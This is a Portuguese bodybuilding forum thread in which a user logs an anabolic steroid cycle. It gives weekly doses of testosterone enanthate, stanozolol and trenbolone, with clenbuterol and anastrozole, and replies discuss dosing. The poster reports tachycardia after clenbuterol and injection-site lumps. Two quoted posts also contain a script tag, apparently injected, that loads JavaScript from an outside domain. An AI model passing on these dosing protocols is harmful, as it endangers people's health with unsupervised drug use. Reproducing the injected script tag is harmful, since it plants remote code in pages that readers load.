Ir para conteúdo
  • Cadastre-se

Prop.testo + Bold **cruise**


Posts Recomendados

  • 2 semanas depois...

Publicidade

  • Respostas 30
  • Criado
  • Última resposta

Mais Ativos no Tópico

Bom galera, vamos lá...

Conforme eu havia dito, houve um atraso por conta do fornecedor. Mas tudo bem, os produtos foram enviados. Comecei as aplicações esta semana, por enquanto somente no glúteo. Inclui o clemb para ajudar a secar. Aeróbicos tsd. Em breve mando fotos para compararem.

Abrç...

Link para o comentário
Compartilhar em outros sites

provavelmente mesmo com "tanta" testo o teu estradiol vai estar muito baixo com 1mg de anastro.. experiencia propria.. não precisa de 1mg/dia.

estou ciclando 600mg/week de deposteron de farma e com 1mg de anastro por dia durante 7 dias apenas, meu estradiol resultou em "inferior a 10"

Sim...porem este foi no primeiro blast, ja no segundo não usaremos.

Abrç

Link para o comentário
Compartilhar em outros sites

Eai galera, blz? voltando aos relatos...

Bom...estou seguindo o protocolo a risca ate o momento sem desvios ou alterações, tudo ainda esta muito normal, mudanças estão começando a surgir a densidade e definição muscular esta ficando mais aparente. Treino estou com mais força obviamente. Confesso que na dieta manda havendo algum deslizes, principalmente fds. mas somente em uma refeição ou outra. Mas mesmo assim me o culpo pra caramba. dieta baixo carbo, muito aero, ai ja viu...stress e tremedeira (o clemb ta ajudando tbm) é de lei.

A zika que to achando é no stano nunca tive nenhum nódulo com qualquer outra drug, porem o stano, o stano haha. ja estou com um de cada na lado da bunda. Meu corpo ainda não se adaptou muito bem com com ele, mas mesmo assim a aplicação continua.

Abrç...

Link para o comentário
Compartilhar em outros sites

Bom galera, estava meio sumido, mas aqui estou.

Finalizei a exatamente uma semana o blast (se é que poderíamos chamar de blast, mas tudo bem). Visualmente evolui bastante, simetria e densidade estão fora da realidade que já me vi. Este foi o primeiro contato com a trembo, no começo fiquei meio receoso, mas graças ao bom Deus ocorreu tudo dentro dos conformes e totalmente diferente do que alguns ¨entendedores¨ me disseram . Este fim de ano deu uma bugada na minha dieta, mas nada que uma boa dose de motivação e persistência não resolva. Ainda estou sobre o efeito das drugs. Ficarei off-drugs por 3 semanas e entraremos com o próximo blast após este período. Segue abaixo:

1-5 500mg Enant. Testo

5-10 750mg Enant. Testo

1-8 150mg Stano

1-5 110mg Trembo

5-10 220mg Trembo

Labs.(GC)

HCG e IA conforme necessidade.

Estamos analisando a possibilidade de incluir Masteron, mas por enquanto esta será a programação, podendo ser alterada a qualquer momento. Futuramente pretendo entrar com GH, mas isso será uma outra etapa, por enquanto fica só na vontade e pesquisas.

Abrçs...

Duvidas, gestões e criticas construtivas, sempre serão bem vindas...

Vou acompanhar mas ai, Tremb não ta muito baixa nao brother? esse MG eh week?

Link para o comentário
Compartilhar em outros sites

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Vou acompanhar mas ai, Tremb não ta muito baixa nao brother? esse MG eh week?

Axo que é tsd rsrsrs ou no máximo dsdn

Editado por rvtz
Link para o comentário
Compartilhar em outros sites

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Axo que é tsd rsrsrs ou no máximo dsdn

UFAAAA.......kkkk

Dsdn, vlw por acompanharem...

Iremos estudar o aumento das doses da 5º sem em diante...

RELATO:

Vamo la galera...

Na semana passada tudo ia muito bem sem muitas alterações, porem...na quinta-feira a noite foi zika. Treinei perna pesado pra caramba e no fim do treino ainda mandei um aero de 20 min. Fiquei destruído!...fiz as duas ultimas refeiçoes e fiu dormir...nao foi 20 mim, começou um taqui cardio acordei loko...suadeira, tremedeira e sai correndo pro banheiro pra mandar uma agua no rosto. Mas apos o susto tudo se normalizou...dai lembrei que tinha mandado o clemb mais ou menos 2 horas antes.(pqp agora só mando clemb antes das 18:00).

Densidade e definição esta cada dia melhor...treino continua com força alem do normal...elogios estão começando a surgir. e na namorada esta passando apertada na madruga rsrs.

Obs: Entrando na 3º semana....

Abrç e bjo no corrassum (no homo)

Editado por Lucas Jackie
Link para o comentário
Compartilhar em outros sites

Dsdn, vlw por acompanharem...

Iremos estudar o aumento das doses da 5º sem em diante...

RELATO:

Vamo la galera...

Na semana passada tudo ia muito bem sem muitas alterações, porem...na quinta-feira a noite foi zika. Treinei perna pesado pra caramba e no fim do treino ainda mandei um aero de 20 min. Fiquei destruído!...fiz as duas ultimas refeiçoes e fiu dormir...nao foi 20 mim, começou um taqui cardio acordei loko...suadeira, tremedeira e sai correndo pro banheiro pra mandar uma agua no rosto. Mas apos o susto tudo se normalizou...dai lembrei que tinha mandado o clemb mais ou menos 2 horas antes.(pqp agora só mando clemb antes das 18:00).

Densidade e definição esta cada dia melhor...treino continua com força alem do normal...elogios estão começando a surgir. e na namorada esta passando apertada na madruga rsrs.

Obs: Entrando na 3º semana....

Abrç e bjo no corrassum (no homo)

kkkkkkkkk, foda eim!!

Posta umas fotos assim que der pra gente acompanhar ai

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.



×
×
  • Criar Novo...